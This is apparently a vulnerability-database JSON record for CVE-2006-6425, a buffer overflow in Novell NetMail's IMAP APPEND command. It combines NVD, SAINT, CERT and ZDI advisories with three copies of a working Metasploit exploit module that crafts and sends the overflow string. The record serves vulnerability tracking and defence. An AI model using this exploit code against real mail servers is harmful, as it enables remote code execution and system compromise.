{"cve": [{"lastseen": "2020-12-09T19:23:50", "description": "Stack-based buffer overflow in the IMAP daemon (IMAPD) in Novell NetMail before 3.52e FTF2 allows remote authenticated users to execute arbitrary code via unspecified vectors involving the APPEND command.\nSuccessful exploitation requires a valid user account.\r\nThis vulnerability is addressed in the following product update:\r\nNovell, NetMail, 3.52e FTF2", "edition": 5, "cvss3": {}, "published": "2006-12-27T01:28:00", "title": "CVE-2006-6425", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-6425"], "modified": "2018-10-17T21:48:00", "cpe": ["cpe:/a:novell:netmail:3.0.1", "cpe:/a:novell:netmail:3.5", "cpe:/a:novell:netmail:3.10", "cpe:/a:novell:netmail:3.5.2", "cpe:/a:novell:netmail:3.1", "cpe:/a:novell:netmail:3.0.3a"], "id": "CVE-2006-6425", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-6425", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:novell:netmail:3.10:g:*:*:*:*:*:*", "cpe:2.3:a:novell:netmail:3.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:novell:netmail:3.10:e:*:*:*:*:*:*", "cpe:2.3:a:novell:netmail:3.1:f:*:*:*:*:*:*", "cpe:2.3:a:novell:netmail:3.5:*:*:*:*:*:*:*", "cpe:2.3:a:novell:netmail:3.5.2:e-ftfl:*:*:*:*:*:*", "cpe:2.3:a:novell:netmail:3.10:c:*:*:*:*:*:*", "cpe:2.3:a:novell:netmail:3.1:*:*:*:*:*:*:*", "cpe:2.3:a:novell:netmail:3.10:f:*:*:*:*:*:*", "cpe:2.3:a:novell:netmail:3.10:a:*:*:*:*:*:*", 
"cpe:2.3:a:novell:netmail:3.10:*:*:*:*:*:*:*", "cpe:2.3:a:novell:netmail:3.10:d:*:*:*:*:*:*", "cpe:2.3:a:novell:netmail:3.0.3a:a:*:*:*:*:*:*", "cpe:2.3:a:novell:netmail:3.10:h:*:*:*:*:*:*", "cpe:2.3:a:novell:netmail:3.0.3a:b:*:*:*:*:*:*", "cpe:2.3:a:novell:netmail:3.10:b:*:*:*:*:*:*"]}], "saint": [{"lastseen": "2019-05-29T17:19:56", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-6425"], "edition": 2, "description": "Added: 12/29/2006 \nCVE: [CVE-2006-6425](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6425>) \nBID: [21723](<http://www.securityfocus.com/bid/21723>) \nOSVDB: [31362](<http://www.osvdb.org/31362>) \n\n\n### Background\n\n[Novell NetMail](<http://www.novell.com/products/netmail/>) is an e-mail and calendaring server application. \n\n### Problem\n\nA buffer overflow in the NetMail IMAP service allows remote, authenticated attackers to execute arbitrary commands by sending a long, specially crafted APPEND command. \n\n### Resolution\n\nApply NetMail 3.5.2e FTF2 for [Linux](<http://support.novell.com/servlet/downloadfile?file=/sec/pub/nm352e_ftf2_lx.tgz>), [Netware](<http://support.novell.com/servlet/downloadfile?file=/sec/pub/nm352e_ftf2_nw.zip>), or [Windows](<http://support.novell.com/servlet/downloadfile?file=/sec/pub/nm352e_ftf2_win.zip>). \n\n### References\n\n[http://www.novell.com/support/search.do?cmd=displayKC&externalId=3096026&sliceId=SAL_Public ](<http://www.novell.com/support/search.do?cmd=displayKC&externalId=3096026&sliceId=SAL_Public\n>) \n<http://www.zerodayinitiative.com/advisories/ZDI-06-054.html> \n\n\n### Limitations\n\nExploit works on NetMail 3.5.2 and requires the login and password of a valid IMAP account. 
\n\n### Platforms\n\nWindows 2000 \nWindows XP \n \n\n", "modified": "2006-12-29T00:00:00", "published": "2006-12-29T00:00:00", "id": "SAINT:75D2335325D559707D90A4698C5C85B4", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/netmail_imap_append", "type": "saint", "title": "NetMail IMAP APPEND command buffer overflow", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2019-06-04T23:19:36", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-6425"], "description": "Added: 12/29/2006 \nCVE: [CVE-2006-6425](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6425>) \nBID: [21723](<http://www.securityfocus.com/bid/21723>) \nOSVDB: [31362](<http://www.osvdb.org/31362>) \n\n\n### Background\n\n[Novell NetMail](<http://www.novell.com/products/netmail/>) is an e-mail and calendaring server application. \n\n### Problem\n\nA buffer overflow in the NetMail IMAP service allows remote, authenticated attackers to execute arbitrary commands by sending a long, specially crafted APPEND command. \n\n### Resolution\n\nApply NetMail 3.5.2e FTF2 for [Linux](<http://support.novell.com/servlet/downloadfile?file=/sec/pub/nm352e_ftf2_lx.tgz>), [Netware](<http://support.novell.com/servlet/downloadfile?file=/sec/pub/nm352e_ftf2_nw.zip>), or [Windows](<http://support.novell.com/servlet/downloadfile?file=/sec/pub/nm352e_ftf2_win.zip>). \n\n### References\n\n[http://www.novell.com/support/search.do?cmd=displayKC&externalId=3096026&sliceId=SAL_Public ](<http://www.novell.com/support/search.do?cmd=displayKC&externalId=3096026&sliceId=SAL_Public\n>) \n<http://www.zerodayinitiative.com/advisories/ZDI-06-054.html> \n\n\n### Limitations\n\nExploit works on NetMail 3.5.2 and requires the login and password of a valid IMAP account. 
\n\n### Platforms\n\nWindows 2000 \nWindows XP \n \n\n", "edition": 4, "modified": "2006-12-29T00:00:00", "published": "2006-12-29T00:00:00", "id": "SAINT:CFFEB3C568AABF3A8E696DC98997CB90", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/netmail_imap_append", "title": "NetMail IMAP APPEND command buffer overflow", "type": "saint", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2016-10-03T15:01:54", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-6425"], "description": "Added: 12/29/2006 \nCVE: [CVE-2006-6425](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6425>) \nBID: [21723](<http://www.securityfocus.com/bid/21723>) \nOSVDB: [31362](<http://www.osvdb.org/31362>) \n\n\n### Background\n\n[Novell NetMail](<http://www.novell.com/products/netmail/>) is an e-mail and calendaring server application. \n\n### Problem\n\nA buffer overflow in the NetMail IMAP service allows remote, authenticated attackers to execute arbitrary commands by sending a long, specially crafted APPEND command. \n\n### Resolution\n\nApply NetMail 3.5.2e FTF2 for [Linux](<http://support.novell.com/servlet/downloadfile?file=/sec/pub/nm352e_ftf2_lx.tgz>), [Netware](<http://support.novell.com/servlet/downloadfile?file=/sec/pub/nm352e_ftf2_nw.zip>), or [Windows](<http://support.novell.com/servlet/downloadfile?file=/sec/pub/nm352e_ftf2_win.zip>). \n\n### References\n\n[http://www.novell.com/support/search.do?cmd=displayKC&externalId=3096026&sliceId=SAL_Public ](<http://www.novell.com/support/search.do?cmd=displayKC&externalId=3096026&sliceId=SAL_Public\n>) \n<http://www.zerodayinitiative.com/advisories/ZDI-06-054.html> \n\n\n### Limitations\n\nExploit works on NetMail 3.5.2 and requires the login and password of a valid IMAP account. 
\n\n### Platforms\n\nWindows 2000 \nWindows XP \n \n\n", "edition": 1, "modified": "2006-12-29T00:00:00", "published": "2006-12-29T00:00:00", "id": "SAINT:8F1B86241DF23534377AA9E12E1E0ACB", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/netmail_imap_append", "type": "saint", "title": "NetMail IMAP APPEND command buffer overflow", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "cert": [{"lastseen": "2020-09-18T20:42:54", "bulletinFamily": "info", "cvelist": ["CVE-2006-6425"], "description": "### Overview \n\nA vulnerability in the way Novell NetMail handles IMAP \"APPEND\" commands may cause a buffer overflow that may allow remote execution of arbitrary code.\n\n### Description \n\nNovell NetMail's IMAP server contains a buffer overflow that may occur when processing parameters supplied to the \"APPEND\" command. An attacker must login to an affected system in order to take advantage of this vulnerability. \n \n--- \n \n### Impact \n\nA remote, authenticated attacker may be able to execute arbitrary code or cause a denial-of-service condition. \n \n--- \n \n### Solution \n\n**Update**\n\nNovell has released an update to address this issue. See Novell document [3096026](<http://www.novell.com/support/search.do?cmd=displayKC&externalId=3096026&sliceId=SAL_Public>) for more details. \n \n--- \n \n### Vendor Information\n\n### Novell, Inc. 
\n\nUpdated: January 15, 2007 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nRefer to Novell document [3096026](<http://www.novell.com/support/search.do?cmd=displayKC&externalId=3096026&sliceId=SAL_Public>).\n\n### References \n\n * [http://www.novell.com/support/search.do?cmd=displayKC&externalId=3096026&sliceId=SAL_Public](<http://www.novell.com/support/search.do?cmd=displayKC&externalId=3096026&sliceId=SAL_Public>)\n * <http://secunia.com/advisories/23437/>\n * <http://www.zerodayinitiative.com/advisories/ZDI-06-054.html>\n * <http://www.securityfocus.com/bid/21729>\n\n### Acknowledgements\n\nThis issue is addressed in Novell document 3096026. 
Novell credits an anonymous researcher working with TippingPoint and the Zero Day Initiative for reporting this issue.\n\nThis document was written by Chris Taschner.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2006-6425](<http://web.nvd.nist.gov/vuln/detail/CVE-2006-6425>) \n---|--- \n**Severity Metric:** | 5.49 \n**Date Public:** | 2006-12-23 \n**Date First Published:** | 2007-01-17 \n**Date Last Updated: ** | 2007-01-30 21:52 UTC \n**Document Revision: ** | 14 \n", "modified": "2007-01-30T21:52:00", "published": "2007-01-17T00:00:00", "id": "VU:258753", "href": "https://www.kb.cert.org/vuls/id/258753", "type": "cert", "title": "Novell NetMail IMAP server vulnerable to buffer overflow when processing \"APPEND\" commands", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2016-02-01T23:58:45", "description": "Novell NetMail. CVE-2006-6425. Remote exploit for windows platform", "published": "2010-05-09T00:00:00", "type": "exploitdb", "title": "Novell NetMail <= 3.52d IMAP APPEND Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-6425"], "modified": "2010-05-09T00:00:00", "id": "EDB-ID:16488", "href": "https://www.exploit-db.com/exploits/16488/", "sourceData": "##\r\n# $Id: novell_netmail_append.rb 9262 2010-05-09 17:45:00Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. 
Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = AverageRanking\r\n\r\n\tinclude Msf::Exploit::Remote::Imap\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Novell NetMail <= 3.52d IMAP APPEND Buffer Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a stack buffer overflow in Novell's Netmail 3.52 IMAP APPEND\r\n\t\t\t\tverb. By sending an overly long string, an attacker can overwrite the\r\n\t\t\t\tbuffer and control program execution.\r\n\t\t\t},\r\n\t\t\t'Author' => [ 'MC' ],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Version' => '$Revision: 9262 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2006-6425' ],\r\n\t\t\t\t\t[ 'OSVDB', '31362' ],\r\n\t\t\t\t\t[ 'BID', '21723' ],\r\n\t\t\t\t\t[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-06-054.html' ],\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => true,\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'thread',\r\n\t\t\t\t},\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 700,\r\n\t\t\t\t\t'BadChars' => \"\\x00\\x0a\\x0d\\x20\",\r\n\t\t\t\t\t'StackAdjustment' => -3500,\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t['Windows 2000 SP0-SP4 English', { 'Ret' => 0x75022ac4 }],\r\n\t\t\t\t],\r\n\t\t\t'DefaultTarget' => 0,\r\n\t\t\t'DisclosureDate' => 'Dec 23 2006'))\r\n\r\n\tend\r\n\r\n\tdef exploit\r\n\t\tsploit = \"a002 APPEND \" + \"saved-messages (\\Seen) \"\r\n\t\tsploit << rand_text_english(1358) + payload.encoded + \"\\xeb\\x06\"\r\n\t\tsploit << rand_text_english(2) + [target.ret].pack('V')\r\n\t\tsploit << [0xe9, -585].pack('CV') + rand_text_english(150)\r\n\r\n\t\tinfo = connect_login\r\n\r\n\t\tif (info == true)\r\n\t\t\tprint_status(\"Trying target 
#{target.name}...\")\r\n\t\t\tsock.put(sploit + \"\\r\\n\")\r\n\t\telse\r\n\t\t\tprint_status(\"Not falling through with exploit\")\r\n\t\tend\r\n\r\n\t\thandler\r\n\t\tdisconnect\r\n\tend\r\nend\r\n", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/16488/"}], "zdi": [{"lastseen": "2020-06-22T11:39:59", "bulletinFamily": "info", "cvelist": ["CVE-2006-6425"], "edition": 3, "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Novell NetMail. Successful exploitation requires the attacker to successfully authenticate to the affected service. The specific flaw exists in the NetMail IMAP server's handling of the APPEND command. A lack of bounds checking on a specific parameter to this command can lead to a stack-based buffer overflow. This vulnerability can be exploited to execute arbitrary code.", "modified": "2006-06-22T00:00:00", "published": "2006-12-22T00:00:00", "href": "https://www.zerodayinitiative.com/advisories/ZDI-06-054/", "id": "ZDI-06-054", "title": "Novell NetMail IMAP APPEND Buffer Overflow Vulnerability", "type": "zdi", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "metasploit": [{"lastseen": "2020-07-02T22:35:49", "description": "This module exploits a stack buffer overflow in Novell's Netmail 3.52 IMAP APPEND verb. 
By sending an overly long string, an attacker can overwrite the buffer and control program execution.\n", "published": "2007-01-01T14:12:22", "type": "metasploit", "title": "Novell NetMail IMAP APPEND Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-6425"], "modified": "2017-07-24T13:26:21", "id": "MSF:EXPLOIT/WINDOWS/IMAP/NOVELL_NETMAIL_APPEND", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::Remote::Imap\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Novell NetMail IMAP APPEND Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in Novell's Netmail 3.52 IMAP APPEND\n verb. By sending an overly long string, an attacker can overwrite the\n buffer and control program execution.\n },\n 'Author' => [ 'MC' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2006-6425' ],\n [ 'OSVDB', '31362' ],\n [ 'BID', '21723' ],\n [ 'ZDI', '06-054' ],\n ],\n 'Privileged' => true,\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'thread',\n },\n 'Payload' =>\n {\n 'Space' => 700,\n 'BadChars' => \"\\x00\\x0a\\x0d\\x20\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n ['Windows 2000 SP0-SP4 English', { 'Ret' => 0x75022ac4 }],\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Dec 23 2006'))\n\n end\n\n def exploit\n sploit = \"a002 APPEND \" + \"saved-messages (\\Seen) \"\n sploit << rand_text_english(1358) + payload.encoded + \"\\xeb\\x06\"\n sploit << rand_text_english(2) + [target.ret].pack('V')\n sploit << [0xe9, -585].pack('CV') + rand_text_english(150)\n\n info = connect_login\n\n if (info == true)\n print_status(\"Trying target #{target.name}...\")\n sock.put(sploit + \"\\r\\n\")\n else\n print_status(\"Not falling through with exploit\")\n end\n\n 
handler\n disconnect\n end\nend\n", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/imap/novell_netmail_append.rb"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:20", "bulletinFamily": "software", "cvelist": ["CVE-2006-6425"], "description": "ZDI-06-054: Novell NetMail IMAP APPEND Buffer Overflow Vulnerability\r\nhttp://www.zerodayinitiative.com/advisories/ZDI-06-054.html\r\nDecember 22, 2006\r\n\r\n-- CVE ID:\r\nCVE-2006-6425\r\n\r\n-- Affected Vendor:\r\nNovell\r\n\r\n-- Affected Products:\r\nNovell NetMail 3.5.2\r\n\r\n-- TippingPoint(TM) IPS Customer Protection:\r\nTippingPoint IPS customers have been protected against this\r\nvulnerability since December 21, 2006 by Digital Vaccine protection\r\nfilter ID 3868. For further product information on the TippingPoint IPS:\r\n\r\n http://www.tippingpoint.com \r\n\r\n-- Vulnerability Details:\r\nThis vulnerability allows remote attackers to execute arbitrary code on\r\naffected installations of Novell NetMail. Successful exploitation\r\nrequires the attacker to successfully authenticate to the affected\r\nservice.\r\n\r\nThe specific flaw exists in the NetMail IMAP server's handling of the\r\nAPPEND command. A lack of bounds checking on a specific parameter to\r\nthis command can lead to a stack-based buffer overflow. This\r\nvulnerability can be exploited to execute arbitrary code.\r\n\r\n-- Vendor Response:\r\nNovell has issued an update to correct this vulnerability. 
More details\r\ncan be found at:\r\n\r\n \r\nhttp://www.novell.com/support/search.do?cmd=displayKC&externalId=3096026&sliceId=SAL_Public\r\n\r\n-- Disclosure Timeline:\r\n2006.08.14 - Vulnerability reported to vendor\r\n2006.12.21 - Digital Vaccine released to TippingPoint customers\r\n2006.12.22 - Coordinated public release of advisory\r\n\r\n-- Credit:\r\nThis vulnerability was discovered by an anonymous researcher.\r\n\r\n-- About the Zero Day Initiative (ZDI):\r\nEstablished by TippingPoint, a division of 3Com, The Zero Day Initiative\r\n(ZDI) represents a best-of-breed model for rewarding security\r\nresearchers for responsibly disclosing discovered vulnerabilities.\r\n\r\nResearchers interested in getting paid for their security research\r\nthrough the ZDI can find more information and sign-up at:\r\n\r\n http://www.zerodayinitiative.com\r\n\r\nThe ZDI is unique in how the acquired vulnerability information is used.\r\n3Com does not re-sell the vulnerability details or any exploit code.\r\nInstead, upon notifying the affected product vendor, 3Com provides its\r\ncustomers with zero day protection through its intrusion prevention\r\ntechnology. Explicit details regarding the specifics of the\r\nvulnerability are not exposed to any parties until an official vendor\r\npatch is publicly available. 
Furthermore, with the altruistic aim of\r\nhelping to secure a broader user base, 3Com provides this vulnerability\r\ninformation confidentially to security vendors (including competitors)\r\nwho have a vulnerability protection or mitigation product.", "edition": 1, "modified": "2006-12-23T00:00:00", "published": "2006-12-23T00:00:00", "id": "SECURITYVULNS:DOC:15476", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:15476", "title": "[Full-disclosure] ZDI-06-054: Novell NetMail IMAP APPEND Buffer Overflow Vulnerability", "type": "securityvulns", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:11:45", "description": "", "published": "2009-11-26T00:00:00", "type": "packetstorm", "title": "Novell NetMail <= 3.52d IMAP APPEND Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-6425"], "modified": "2009-11-26T00:00:00", "id": "PACKETSTORM:83098", "href": "https://packetstormsecurity.com/files/83098/Novell-NetMail-3.52d-IMAP-APPEND-Buffer-Overflow.html", "sourceData": "`## \n# $Id$ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \n \nrequire 'msf/core' \n \n \nclass Metasploit3 < Msf::Exploit::Remote \n \ninclude Msf::Exploit::Remote::Imap \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Novell NetMail <= 3.52d IMAP APPEND Buffer Overflow', \n'Description' => %q{ \nThis module exploits a stack overflow in Novell's Netmail 3.52 IMAP APPEND \nverb. 
By sending an overly long string, an attacker can overwrite the \nbuffer and control program execution. \n}, \n'Author' => [ 'MC' ], \n'License' => MSF_LICENSE, \n'Version' => '$Revision$', \n'References' => \n[ \n[ 'CVE', '2006-6425' ], \n[ 'OSVDB', '31362' ], \n[ 'BID', '21723' ], \n[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-06-054.html' ], \n], \n'Privileged' => true, \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'thread', \n}, \n'Payload' => \n{ \n'Space' => 700, \n'BadChars' => \"\\x00\\x0a\\x0d\\x20\", \n'StackAdjustment' => -3500, \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n['Windows 2000 SP0-SP4 English', { 'Ret' => 0x75022ac4 }], \n], \n'DefaultTarget' => 0, \n'DisclosureDate' => 'Dec 23 2006')) \n \nend \n \ndef exploit \nsploit = \"a002 APPEND \" + \"saved-messages (\\Seen) \" \nsploit << rand_text_english(1358) + payload.encoded + \"\\xeb\\x06\" \nsploit << rand_text_english(2) + [target.ret].pack('V') \nsploit << [0xe9, -585].pack('CV') + rand_text_english(150) \n \ninfo = connect_login \n \nif (info == true) \nprint_status(\"Trying target #{target.name}...\") \nsock.put(sploit + \"\\r\\n\") \nelse \nprint_status(\"Not falling through with exploit\") \nend \n \nhandler \ndisconnect \nend \nend \n`\n", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/83098/novell_netmail_append.rb.txt"}]}